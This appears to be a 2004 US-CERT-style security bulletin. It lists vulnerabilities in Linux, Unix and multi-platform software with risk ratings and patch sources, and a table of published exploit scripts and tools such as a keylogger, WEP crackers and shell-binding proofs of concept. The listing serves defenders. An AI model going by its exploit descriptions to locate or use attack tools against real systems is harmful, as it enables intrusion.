GNOME VFS Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64; | Multiple vulnerabilities exist in several of the GNOME VFS exists backend scripts, which could let a malicious user influence a user to open a specially-crafted URI using gnome-vfs could perform actions as that user. Users of Red Hat Enterprise Linux should upgrade to these updated packages, which remove these unused scripts. Before applying this update, make sure that all previously-released errata relevant to your system have been applied. Use Red Hat Network to download and update your packages. To launch the Red Hat Update Agent, use the following command: up2date For information on how to install packages manually, refer to the following Web page for the System Administration or Customization guide specific to your system: http://www.redhat.com/docs/manuals/enterprise/ SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ We are not aware of any exploits for this vulnerability. | GNOME VFS updates address exists vulnerability CVE Name: | High | Red Hat Security Advisory ID: RHSA-2004:373-01, August 4, 2004 SGI Security Advisory, 20040802-01-U, August 14, 2004 |
Gaim 0.10 x, 0.10.3, 0.50-0.75 | Multiple vulnerabilities exist which could let a remote malicious user execute arbitrary code or cause a Denial of Service: a vulnerability exists during the installation of a smiley theme; a heap overflow vulnerability exists when processing data from a groupware server; a buffer overflow vulnerability exists in the URI parsing utility; a buffer overflow vulnerability exists when performing a DNS query to obtain a hostname when signing on to zephyr; a buffer overflow vulnerability exists when processing Rich Text Format (RTF) messages; and a buffer overflow vulnerability exists in the 'content-length' header when an excessive value is submitted.
Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/ Gentoo:http://security.gentoo.org/glsa/glsa-200408-27.xml Rob Flynn: Slackware: ftp://ftp.slackware.com/pub/slackware/slackware-10.0/ We are not aware of any exploits for this vulnerability. | Gaim Multiple Vulnerabilities CVE Names: | Low/High
(High if arbitrary code can be executed) | SecurityFocus, August 26, 2004 |
A vulnerability exists in rsync when running in daemon mode with chroot disabled. A remote user may be able read or write files on the target system that are located outside of the module's path. A remote user can supply a specially crafted path to cause the path cleaning function to generate an absolute filename instead of a relative one. The flaw resides in the sanitize_path() function. Updates and patches are available at: http://rsync.samba.org/ SuSE: http://www.suse.de/de/security/2004_26_rsync.html Debian: http://www.debian.org/security/2004/dsa-538 Trustix: http://www.trustix.net/errata/2004/0042/ Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-17.xml Netwosix: http://www.netwosix.org/adv17.html Mandrake: http://www.mandrakesecure.net/en/ftp.php OpenPKG: ftp://ftp.openpkg.org/release/2.0/UPD/rsync-2.6.0-2.0.2.src.rpm TurboLinux: ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/ We are not aware of any exploits for this vulnerability. | Rsync Input Validation Error in sanitize_path() May Let Remote Users Read or Write Arbitrary Files | High | SecurityTracker 1010940, August 12, 2004 rsync August 2004 Security Advisory OpenPKG Security Advisory, OpenPKG-SA-2004.037, August 15, 2004 Tinysofa Security Advisory, TSSA-2004-020-ES, August 16, 2004 Gentoo Linux Security Advisory GLSA 200408-17, August 17, 2004 Netwosix Linux Security Advisory, LNSA-#2004-0017, August 17, 2004 Mandrakelinux Security Update Advisory, MDKSA-2004:083, August 17, 2004 Fedora Update Notification, Turbolinux Security Advisory, TLSA-2004-20, August 31, 2004 | |
Samba 2.2.11, 3.0.6 | A remote Denial of Service vulnerability exists due to the way print change notify requests are processed.
Trustix: http://http.trustix.org/pub/trustix/updates/ We are not aware of any exploits for this vulnerability. | Samba Remote Print Change Notify Remote Denial of Service | Low | Trustix Secure Linux Security Advisory, TSL-2004-0043, August 26, 2004 |
sox.sourceforge.net SoX 12.17.4, 12.17.3, and 12.17.2 | Multiple vulnerabilities exist that could allow a remote malicious user to execute arbitrary code This is due to boundary errors within the "st_wavstartread()" function when processing ".WAV" file headers and can be exploited to cause stack-based buffer overflows. Successful exploitation requires that a user is tricked into playing a malicious ".WAV" file with a large value in a length field. Fedora: Mandrakesoft: href="http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:076%20">http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:076 Gentoo: href="http://security.gentoo.org/glsa/glsa-200407-23.xml">http://security.gentoo.org/glsa/glsa-200407-23.xml Conectiva: href="ftp://atualizacoes.conectiva.com.br">ftp://atualizacoes.conectiva.com.br RedHat: href="http://rhn.redhat.com/errata/RHSA-2004-409.html">http://rhn.redhat.com/errata/RHSA-2004-409.html Slackware: ftp://ftp.slackware.com/pub/slackware/ SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ Exploit script has been published. | High | Secunia, SA12175, 12176, 12180, July 29, 2004 SecurityTracker Alerts 1010800 and 1010801, July 28/29, 2004 Mandrakesoft Security Advisory MDKSA-2004:076, July 28, 2004 PacketStorm, August 5, 2004 Slackware Security Advisory, SSA:2004-223-03, august 10, 2004 SGI Security Advisory, 20040802-01-U, August 14, 2004 | |
SpamAssassin prior to 2.64 | A Denial of Service vulnerability exists in SpamAssassin. A a remote user can send an e-mail message with specially crafted headers to cause a Denial of Service attack against the SpamAssassin service. Update to version (2.64), available at: http://old.spamassassin.org/released/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-06.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php We are not aware of any exploits for this vulnerability. | SpamAssassin Remote Denial of Service | Low | SecurityTracker: 1010903, August 10, 2004 Mandrake Security Advisory, MDKSA-2004:084, August 19, 2004 |
DtMai, Solaris 8.0 _x86, 8.0, 9.0 _x86, 9.0 | A buffer overflow vulnerability exists in the dtmailer when processing command line arguments, which could let a malicious user execute arbitrary code. Patches available at: http://sunsolve.sun.com/pub-cgi/ We are not aware of any exploits for this vulnerability. | Sun CDE Mailer Buffer Overflow CVE Name: | High | Sun(sm) Alert Notification, 57627, August 23, 2004 US-CERT Vulnerability Note VU#928598, August 25, 2004 |
Solaris 7.0 _x86, 7.0, 8.0 _x86, 8.0, 9.0 _x86, 9.0 | A buffer overflow vulnerability exists in 'LOGNAME' environment variables in CDE libDTHelp due to insufficient a lack of bounds checking, which could let a malicious user execute arbitrary code. Patches available at: http://sunsolve.sun.com/pub-cgi/ We are not aware of any exploits for this vulnerability. | CDE LibDTHelp LOGNAME Environment Variable Buffer Overflow | High | iDEFENSE Security Advisory, August 25, 2004 |
suPHP 0.3, 0.3.1, 0.5-0.5.2 | A vulnerability exists due to insufficient validation during access control checks prior to executing PHP in a target file, which could let a malicious user obtain elevated privileges.
No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | SUPHP Elevated Privileges | Medium | Bugtraq, August 23, 2004 |
Plesk Reloaded 7.1 | A Cross-Site Scripting vulnerability exists in 'login_up.php3' due to insufficient sanitization of the 'login_name' parameter, which could let a remote malicious user execute arbitrary HTML and script code.
No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Plesk 'Login_name' Parameter Cross-Site Scripting | High | Secunia Advisory, SA12368, August 25, 2004 |
Sympa 3.x, 2.x, 4.0 .x, 4.1, 4.1.1 | A vulnerability exists in 'wwsympa/wwsympa.fcgi' when creating new mailing lists, which could let a malicious user bypass authentication. Upgrades available at: There is no exploit code required. | Sympa List Creation Authentication Bypass | Medium | Secunia Advisory, SA12286, August 13, 2004 |
Sympa 4.0 .x, 4.1-4.1.2 | A Cross-Site Scripting vulnerability exists in the 'description' field due to insufficient sanitization of user-supplied input data, which could let a remote malicious user execute arbitrary HTML and script code.
No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Sympa Cross-Site Scripting | High | Securiteam, August 22, 2004 |
WebAPP 0.9.9 | A Directory Traversal vulnerability exists in the 'index.cgi' script due to insufficient sanitization, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | WebAPP Directory Traversal | Medium | SecurityFocus, August 24, 2004 |
xine 0.99.2 | A buffer overflow vulnerability exists in xine in the processing of 'vcd://' protocol identifiers. A remote malicious user can execute arbitrary code on the target system. A remote malicious user can trigger a stack overflow in xine-lib by embedding a specially crafted source identifier within a playlist file, for example. When the target user plays the file, arbitrary code can be executed with the privileges of the target user. A patch is available via CVS at: http://sourceforge.net/mail archive/forum.php?thread_id=5143955&forum_id=11923 Gentoo: http://security.gentoo.org/glsa/glsa-200408-18.xml A Proof of Concept exploit script has been published. | xine Buffer Overflow in Processing 'vcd' Identifiers Lets Remote Users Execute Arbitrary Code | High | SecurityTracker: 1010895, August 8, 2004 Open security advisory #6, August, 8, 2004 Gentoo Linux Security Advisory GLSA 200408-18, August 17, 2004 |
Ruby 1.6, 1.8 | A vulnerability exists in the CGI session management component due to the way temporary files are processed,which could let a malicious user obtain elevated privileges. Upgrades available at: http://security.debian.org/pool/updates/main/r/ruby/ We are not aware of any exploits for this vulnerability. | Ruby CGI Session Management Unsafe Temporary File CVE Name: | Medium | Debian Security Advisory, DSA 537-1, August 16, 2004 |
| Multiple Operating Systems - Windows / UNIX / Linux / Other | ||||
Vendor & Software Name | Vulnerability - Impact Patches - Workarounds Attacks Scripts | Common Name | Risk | Source |
AWStats 5.0-5.9, 6.0-6.2 | An input validation vulnerability exists in the 'awstats.pl' script due to insufficient sanitization, which could let a remote malicious user execute arbitrary commands. No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | AWStats 'awstats.pl' Input Validation | High | SecurityFocus, August 19, 2004 |
Firmware Version 2.40; Axis 2100/2110/2120/2420/2130, Network Camera, 2400/2401 Video Server | Multiple vulnerabilities exist: an input validation vulnerability exists in the '/axis-cgi/io/virtualinput.cgi' script, which could let a remote malicious user execute arbitrary commands; and a Directory Traversal vulnerability exists, which could let a remote malicious user obtain sensitive information.
No workaround or patch available at time of publishing. There is no exploit code required; however, Proofs of Concept exploits have been published. | Axis Network Camera And Video Server Multiple Vulnerabilities
| Medium/High (High if arbitrary commands can be executed) | Bugtraq, August 22, 2004 |
StorPoint CD | A vulnerability exists because a hard-coded administrative backdoor exists, which could let a remote malicious user obtain administrative access.
No workaround or patch available at time of publishing. There is no exploit code required; however, Proofs of Concept exploits have been published. | StorPoint CD Administrative Backdoor | High | Bugtraq, August 22, 2004 |
IOS 12.0S, 12.2, 12.3 | A remote Denial of Service vulnerability exists when a malicious user continuously transmits malformed Open Shortest Path First (OSPF) packets. Updates available at: We are not aware of any exploits for this vulnerability. | IOS OSPF Remote Denial of Service | Low | Cisco Security Advisory, 61365, August 21, 2004 US-CERT Vulnerability Note VU#989406 |
IOS R12.x, 12.x
| A remote Denial of Service vulnerability exists when a malicious user submits a specially crafted TCP connection to a telnet or reverse telnet port.
Potential workarounds available at: We are not aware of any exploits for this vulnerability. | Cisco IOS Telnet Service Remote Denial of Service | Low | Cisco Security Advisory, cisco-sa-20040827, August 27, 2004 US-CERT Vulnerability Note VU#384230 |
WebPac | Input validation vulnerabilities exist due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary code.
No workaround or patch available at time of publishing. There is no exploit code required.
| WebPAC Input Validation | High | Bugtraq, August 24, 2004 |
GroupWare 1.0, 1.0.3 | Multiple Cross-Site Scripting vulnerabilities exist in the 'addressbook' and 'calendar' modules and HTML injections vulnerabilities exist in the 'Messenger' and 'Ticket' modules, which could let a remote malicious user execute arbitrary HTML and script code.
No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | EGroupWare Multiple Input Validation | High | Bugtraq, August 22, 2004 |
| Entrust LibKMP ISAKMP Library | A buffer overflow vulnerability exists in the main SA payloads due to insufficient sanity checking, which could let a remote malicious user cause a Denial of Service or execute arbitrary code. Symantec: ftp://ftp.symantec.com/public/updates/ We are not aware of any exploits for this vulnerability. | Entrust LibKmp Library Buffer Overflow CVE Name: CAN-2004-0369 | Low/High (High if arbitrary code can be executed) | Internet Security Systems Protection Advisory, August 26, 2004 |
Hastymail 1.0.1, 1.1 | A vulnerability exists when the 'download' link is invoked due to a failure to return the proper heading, which could let a remote malicious user execute arbitrary HTML and script code.
Upgrades available at: http://sourceforge.net/project/showfiles.php? There is no exploit code required. | Hastymail Email 'Download' Arbitrary Code | High | Secunia Advisory, SA12358, August 24, 2004 |
Icecast 1.3 .10, 1.3 .0, 1.3.5 -1, 1.3.5, 1.3.7 -1, 1.3.7, 1.3.8 | An Cross-Site Scripting vulnerability exists in 'src/http.c' due to insufficient validation of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. Debian: http://security.debian.org/pool/updates/main/i/icecast-server/ There is no exploit code required. | Icecast Cross-Site Scripting CVE Name: CAN-2004-0781 | High | Debian Security Advisory, DSA 541-1, August 24, 2004 |
Mantis 0.19 .0a | A vulnerability exists if the 'REGISTER_GLOBAL' because a remote malicious user can specify the 't_core_dir' variable to cause arbitrary code to be executed.
Update available at: http://mantisbt.sourceforge.net/ There is no exploit code required; however, a Proof of Concept exploit has been published. | Mantis 't_core_dir' Variable | High | SecurityTracker Alert ID: 1011015, August 22, 2004 |
Mantis Mantis 0.9, 0.9.1, 0.10-0.10.2, 0.11, 0.11.1, 0.12, 0.13, 0.13.1, 0.14- 0.14.8, 0.15-0-0.15.12, 0.16.0, 0.16.1, 0.17.0 | Two vulnerabilities exist: a vulnerability exists in 'login_page.php' in the 'return' parameter due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML or script code; and a vulnerability exists in 'signup.php' in the 'email' parameter due to insufficient sanitization, which could let a remote malicious user execute arbitrary script code.
Update available at: http://mantisbt.sourceforge.net/ There is no exploit code required; however, a Proof of Concept exploit has been published. | Mantis Cross-Site Scripting & HTML Injection | High | Secunia Advisory, SA12338, August 23, 2004 |
Cute PHP Library (cphplib) 0.42-0.46 | An Input validation vulnerability exist in the Cute PHP Library (cphplib) due to insufficient validation of certain parameters, which could let a remote malicious user executed arbitrary HTML code.
Upgrade available at: http://www.meindlsoft.com/cphplib_download.php We are not aware of any exploits for this vulnerability. | Cute PHP Library (cphplib) Input Validation | High | SecurityFocus, August 27, 2004 |
Mozilla Organization Mozilla 1.7 and prior; | Multiple vulnerabilities exist in Mozilla, Firefox, and Thunderbird that could allow a malicious user to conduct spoofing attacks, compromise a vulnerable system, or cause a Denial of Service. These vulnerabilities include buffer overflow, input verification, insecure certificate name matching, and out-of-bounds reads. Upgrade to the latest version of Mozilla, Firefox, or Thunderbird available at: http://www.mozilla.org/download.html Mandrakesoft: RedHat: http://rhn.redhat.com/errata/RHSA-2004-421.html SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ We are not aware of any exploits for this vulnerability. | Mozilla Multiple Vulnerabilities CVE Name: CAN-2004-0757 | High | Secunia, SA10856, August 4, 2004 US-CERT Vulnerability Note VU#561022 RedHat Security Advisory, RHSA-2004:421-17, August 4, 2004 SGI Security Advisory, 20040802-01-U, August 14, 2004 |
HP HP-UX B.11.23, 11.11, 11.00; | A buffer overflow vulnerability exists in the Netscape Network Security Services (NSS) library suite due to insufficient boundary checks, which could let a remote malicious user which may result in remote execute arbitrary code.
Mozilla:/ftp://ftp.mozilla.org/pub/mozilla.org/security/nss/releases/NSS_3_9_2_RTM/ We are not aware of any exploits for this vulnerability. | NSS Buffer Overflow | High | Internet Security Systems Advisory, August 23, 2004 |
NR041 1.2 Release 03 | A vulnerability exists in the DHCP daemon due to insufficient sanitization of user-supplied input that is passed with the 'DHCP HOSTNAME' option, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required. | Network Everywhere Router Remote Script Injection | High | Secunia Advisory, SA12393, August 27, 2004 |
iChain Server 2.3 | Multiple vulnerabilities exist: a vulnerability exists due to Insufficient validation of overly long UTF-8 encodings, which could let a remote malicious user bypass access control rules; a vulnerability exists due to insufficient sanitization of user-supplied input passed to the web server, which could let a remote malicious user execute arbitrary HTML and script code; a remote Denial of Service vulnerability exists when a remote malicious user submits a specially crafted URL; a vulnerability exists in the 'VIA' header, which could let a remote malicious user obtain sensitive information; and a vulnerability exists due to the insecure transmission of password and username credentials, which could let a remote malicious user obtain sensitive information.
Patch available at : http://support.novell.com/servlet/filedownload/sec/ftf/b1ic23sp1.exe There is no exploit code required. | iChain Multiple Unspecified Remote Vulnerabilities | Low/Medium/High (Low if a DoS; Medium if sensitive information can be obtained; and High if arbitrary code can be executed)
| Technical Information Document, TID2969621, August 24, 2004 |
Opera Web Browser 7.52, 7.53 | A vulnerability exists in IFRAME, which could let a malicious user obtain sensitive information.
Upgrades available at: http://www.opera.com/download/ Proof of Concept exploit has been published. | Opera Web Browser Resource Detection | Medium | GreyMagic Security Advisory GM#009-OP, August 17, 2004 |
PhotoADay | A Cross-Site Scripting vulnerability exists in the 'PhotoADay' PHP-Nuke module due to insufficient sanitization of user-supplied URI input, which could let a remote malicious user execute arbitrary HTML and script code.
No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PhotoADay Pad_selected Parameter Cross-Site Scripting | High | SecurityTracker Alert ID, 1011027, August 23, 2004 |
PForum 1.24, 1.25 | A Cross-Site Scripting vulnerability exists due to insufficient sanitization of the 'IRC Server' and 'AIM ID' fields, which could let a remote malicious user execute arbitrary HTML and script code.
Upgrades available at: There is no exploit code required; however, a Proof of Concept exploit has been published. | PScript PForum Cross-Site Scripting | High | Bugtraq, August 14, 2004 US-CERT Vulnerability Note VU#674542, August 18,2004 |
PvPGN 1.6 .0-1.6.3 | A vulnerability exists in the 'passhash' attribute, which could let a remote malicious user obtain authentication information.
Upgrades available at: We are not aware of any exploits for this vulnerability. | PvPGN Information Disclosure | Medium | PvPGN Security Advisory, PSA-20040823, August 23, 2004 |
TikiWiki 1.8-1.8.3 | Two vulnerabilities exist: a vulnerability exists because individual wiki page permissions can be bypassed, which could let a remote malicious user obtain unauthorized access; and a vulnerability exists in 'smarty_tiki' which could let a remote malicious user obtain sensitive information. Upgrades available at: There is no exploit code required. | TikiWiki Unauthorized Access & Information Disclosure | Medium | SecurityTracker Alert ID: 1010962, August 17, 2004 |
TopLayer Attack Mitigator 5500 3.11 .008 | A remote Denial of Service vulnerability exists when a malicious user submits a high volume of HTTP traffic. Update available at: http://www.toplayer.com/content/support/tech_assist/index.jsp There is no exploit code required. | Top Layer Attack Mitigator IPS 5500 Remote Denial of Service | Low | IRM Security Advisory No. 010, August 25, 2004 |
Xephyrus Java Simple Template Engine (JST) 0.9, 1.0, 1.1, 2.0, 2.1 (limited distro), 3.0 (public distro) | A Directory Traversal vulnerability exists because 'file-token' values may be overridden by URI parameters, which could let a malicious user obtain sensitive information. Upgrades available at: http://www.xephyrus.com/jest/ There is no exploit code required. | Xephyrus Java Simple Template Directory Traversal | Medium | Security Advisory JST-001, August 16, 2004 |
JShop E-Commerce, Professional v3, JShop Server | A Cross-Site Scripting vulnerability exists in the 'page.php' script due to insufficient filtering of user-supplied input in the 'xPage' parameter, which could let a remote malicious user execute arbitrary HTML and script code.
No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | E-Commerce Suite Page.PHP Cross-Site Scripting | High | Indonesia Security Development Team Advisory, August 22, 2004 |
Recent Exploit
Scripts/Techniques
The table below contains a
sample of exploit scripts and "how to" guides identified during
this period. Items listed in boldface/red (if any) are attack scripts/techniques for which vendors, security vulnerability listservs, or Computer Emergency Response Teams (CERTs) have not published workarounds or patches, or which represent scripts that malicious users are utilizing.
Note: At times, scripts/techniques may
contain names or content that may be considered offensive.
Date of Script | Script name | Workaround or Patch Available | Script Description |
| August 31, 2004 | dlinkdown.c | No | Remote exploit that will change an IP address for the D-Link DCS-900 IP camera, due to the fact that it listens for a 62976/udp broadcast packet telling it what IP address to use without any authentication. |
| August 31, 2004 | gc2boom.zip | No | Proof of concept exploit for the denial of service vulnerability in Ground Control II: Operation Exodus versions 1.0.0.7 and below. |
| August 31, 2004 | gwee-1.36.tar.gz | N/A | Generic Web Exploitation Engine (gwee), is a small program designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose. |
| August 31, 2004 | keeneTraversal102.txt | No | Proof of concept exploit for Keene Digital Media Server version 1.0.2 which is susceptible to a directory traversal attack due an input validation vulnerability |
| August 31, 2004 | neb-citadel.c | Yes | Remote exploit for Citadel/UX versions 6.23 and below that makes use of the USER directive overflow vulnerability. |
| August 31, 2004 | skl0g_v1.14.zip | N/A | skl0g is a keylogger for Windows. It runs invisibly, logs everything that is typed at the computer and saves them in log files according to the date. |
| August 31, 2004 | tcpick-0.1.24.tar.gz | N/A | tcpick is a textmode sniffer that can track TCP streams and saves the data captured in files or displays them in the terminal. |
| August 31, 2004 | weplab-0.1.0-beta.tar.gz weplab-0.1.0-beta-win32_01.zip | N/A | Weplab is a tool to review the security of WEP encryption in wireless networks. Several attacks are available to help measure the effectiveness and minimum requirements for the network. |
| August 27, 2004 | aircrack-1.3.tgz | N/A | Aircrack is an 802.11 WEP cracking program that can recover a 40-bit or 104-bit WEP key once enough encrypted packets have been gathered. It implements the standard FMS attack along with some optimizations, thus making the attack much faster compared to other WEP cracking tools. |
| August 27, 2004 | Codebase.gen | No | Code that exploits the Winamp skin remote code execution vulnerability. |
| August 27, 2004 | gaucho140poc.cpp.txt | Yes | Proof of concept exploit that simulates a POP3 server which sends a specially crafted email to a vulnerable Gaucho email client, triggering an overflow and binding a shell on port 2001. Version 1.4 build 145 is susceptible. |
| August 27, 2004 | winampExploit.txt | No | Proof of concept exploit that was found in the wild by k-otik.com that makes use of the Winamp vulnerability where insufficient restrictions on Winamp skin zip files (.wsz) allow a malicious attacker to place and execute arbitrary programs on a victim's system. |
| August 26, 2004 | 00045-08242004.txt | No | Proof of concept exploit for the denial of service and unauthorized system access vulnerabilities in Easy File Sharing webserver version 1.25. |
| August 26, 2004 | efswsdos.pl | No | Proof of concept exploit for the denial of service vulnerability in Easy File Sharing webserver version 1.25. |
| August 26, 2004 | gallery-php.txt | Yes | PHP based exploit for Gallery versions 1.4.4 and below that makes use of an arbitrary file upload flaw. |
| August 26, 2004 | gc2.tar | No | Proof of Concept exploit for the Ground Control II Remote Denial of Service vulnerability. |
| August 26, 2004 | gmailSurf.txt | Yes | Proof of concept exploit for input validation vulnerability in Google's GMail system which allows users to surf anonymously. |
| August 26, 2004 | md-xplv2.c | No | Script that exploits the Music Daemon Information Disclosure vulnerability. |
| August 26, 2004 | networkEverywhere.txt | No | Proof of concept exploit for the script injection over DHCP vulnerability in NetworkEverywhere router Model NR041. |
| August 26, 2004 | painkex.zip | No | Proof of concept exploit for Painkiller versions 1.3.1 and below that makes use of a memory corruption flaw. |
| August 26, 2004 | PST_chpasswd_exp-v_b.c | Yes | Squirrelmail chpasswd local root bruteforce exploit. |
| August 26, 2004 | RealVNC_dos.c | No | Proof of Concept exploit for the RealVNC Server Remote Denial of Service vulnerability. |
| August 26, 2004 | webapp.traversal.txt | No | Proof of concept exploit the WebAPP vulnerabilities that could permit a directory traversal attack and the ability to retrieve the DES encrypted password hash of the administrator. |
| August 25, 2004 | find_shell code | N/A | This shellcode scans the address space of the vulnerable process for a certain pattern. Once found it jumps into it. This assumes that a remote buffer overflow target has limited buffer space and storing the bind shellcode in the buffer is difficult but storing it "somewhere" is possible. |
| August 24, 2004 | 00042-08202004.txt | No | Proof of concept exploit for the BadBlue Webserver version 2.5 Denial of Service vulnerability. |
| August 24, 2004 | AntiExploit-1.3b2.tar.gz | N/A | AntiExploit is an exploit scanner to detect local intruders. It scans for over 3900 suspicious files, has daily database updates, and will act if a file is accessed. It uses the dazuko kernel module, which is also used by clamAV, Amavis, and other virus scanners. |
| August 24, 2004 | axisFlaws.txt | No | Proof of concept exploit for multiple vulnerabilities in Axis versions 2100, 2110, 2120, 2420, and 2130 Network Camera along with the 2400 and 2401 Video Servers. |
| August 24, 2004 | hafiye.txt | No | Proof of concept exploit for Hafiye 1.0 terminal escape sequence injection vulnerability that can result in a denial of service and remote root compromise. |
| August 24, 2004 | musicDaemon.txt | No | Proof of concept exploit for the MusicDaemon versions 0.0.3 and prior remote Denial of Service and other vulnerabilities. |
| August 24, 2004 | MyDMS.txt | Yes | Proof of concept exploit for the MyDNS SQL injection and directory traversal vulnerabilities. |
| August 24, 2004 | qt_bmp_heap_overflow.c | Yes | Proof of concept exploit for the qt BMP parsing vulnerability in version 3.3.2. |
| August 24, 2004 | qt_bmpslap.c | Yes | Heap overflow exploit for the qt BMP parsing vulnerability in version 3.3.2. |
| August 24, 2004 | regmon_dos.c | No | A Proof of Concept exploit script for the Regmon Local Denial of Service vulnerability. |
| August 24, 2004 | txt-rant.txt | N/A | Information about how Microsoft and Virus scanners fail to properly pay attention to .txt file extensions and how they can be used by attackers to fall into the background. |
| August 23, 2004 | birdCahtDOSExploit.java | No | Exploit for the Bird Chat Remote Denial of Service vulnerability. |
| August 20, 2004 | badblue_webserver_dos.pl | No | Proof of Concept exploit for the BadBlue Webserver Denial Of Service vulnerability. |
| August 20, 2004 | xv_bmpslap.c | No | Script that exploits the xv vbmp.c Buffer Overflow vulnerability |
| August 19, 2004 | malware.sp2.zip | No | Exploit for the Internet Explorer MHTML Content-Location Cross Security Domain Scripting vulnerability. |
| August 19, 2004 | malware.sp2.zip | Yes | Exploit for the Internet Explorer MHTML Content-Location Cross Security Domain Scripting vulnerability. |
| August 19, 2004 | merak527.txt | Yes | Script that exploits various vulnerabilities in the Merak Webmail server version 5.2.7. |
| August 19, 2004 | rkhunter-1.1.6.tar.gz | N/A | Rootkit Hunter scans files and systems for known and unknown rootkits, backdoors, and sniffers. The package contains one shell script, a few text-based databases, and optional Perl modules. It should run on almost every Unix variety except Solaris and NetBSD. |
| August 19, 2004 | yapig-php.txt | No | PHP based exploit script for YaPiG 0.x. |
| August 18, 2004 | gv-exploitv2.c | Yes | Script that exploits the local buffer overflow vulnerability in the gv postscript viewer. |
| August 18, 2004 | Imailpwdump.cpp | Yes | Password decryption utility for the IpSwitch IMail Server versions 8.1 and prior. |
| August 18, 2004 | ipd-dos.c | Yes | Proof of concept exploit for the IPD (Integrity Protection Driver) Denial of Service vulnerability. |
| August 18, 2004 | playsms_sql.pl | No | Proof of Concept exploit for the PlaySMS SQL Input Validation vulnerability. |
| August 17, 2004 | dnsspoof.zip | Yes | Utility that automates the DNS spoofing vulnerability in Microsoft Windows XP SP1. It generates a script file that launches the netwox application with correct parameters. It works with Windows and Linux. |
| August 17, 2004 | xine_bof.c | Yes | Script that exploits the xine Buffer Overflow in Processing 'vcd' Identifiers Lets Remote Users Execute Arbitrary Code vulnerability. |
name=trends>Trends
- US-CERT Cyber Security Alert SA04-243A: Security Improvements in Windows XP Service Pack 2. Windows XP
Service Pack 2 is a major operating system update that contains a number of new security updates and features. Like other Microsoft Service Packs, Windows XP Service Pack 2 also includes previously released security fixes and other operating system updates. To help protect your Windows XP computer from attacks and vulnerabilities, install Service Pack 2 using Windows Update or Automatic Updates. Service Pack 2 makes significant changes to improve the security of Windows XP, and these changes may have negative effects effects on some programs and Windows functionality. Before you install Service Pack 2, back up your important data and consult your computer manufacturer's web site for information about Service Pack 2. Downloads are available at: http://www.microsoft.com/windowsxp/sp2/default.mspx. See US-CERT Advisory at: http://www.uscert.gov/cas/alerts/SA04-243A.html
name=#viruses>Viruses/Trojans
New Viruses / Trojans
Viruses or Trojans Considered to be a High Level of Threat
- Download.Ject: A new version of Download.Ject infects vulnerable systems with a Trojan horse and a keystroke logger. Unlike the original Download.Ject worm, the new worm generates pop-up advertisements to pornographic sites and changes the Web home page and the Internet Explorer search pane on infected systems. the attacks begin with instant messages sent to people using America Online's AOL Instant Messenger or ICQ instant messaging program inviting recipients to click on a link to a Web page.
- W64.Shruggle.1318: While not a high threat virus, W64.Shruggle.1318 is the first known virus to attack 64-bit Windows executables on AMD64 systems. This virus infects AMD64 Windows Portable Executable (PE) files.
The following table provides, in alphabetical order, a list of new viruses, variations of previously encountered viruses, and Trojans that have been discovered during the period covered by this bulletin. This information has been compiled from the following anti-virus vendors: Sophos, Trend Micro, Symantec, McAfee, Network Associates, Central Command, F-Secure, Kaspersky Labs, MessageLabs, Panda Software, Computer Associates, and The WildList Organization International. Users should keep anti-virus software up to date and should contact their anti-virus vendors to obtain specific information on the Trojans and Trojan variants that anti-virus software detects.
NOTE: At times, viruses and Trojans may contain names or content that may be considered offensive.
Last updated
Please share your thoughts
We recently updated our anonymous product survey; we’d welcome your feedback.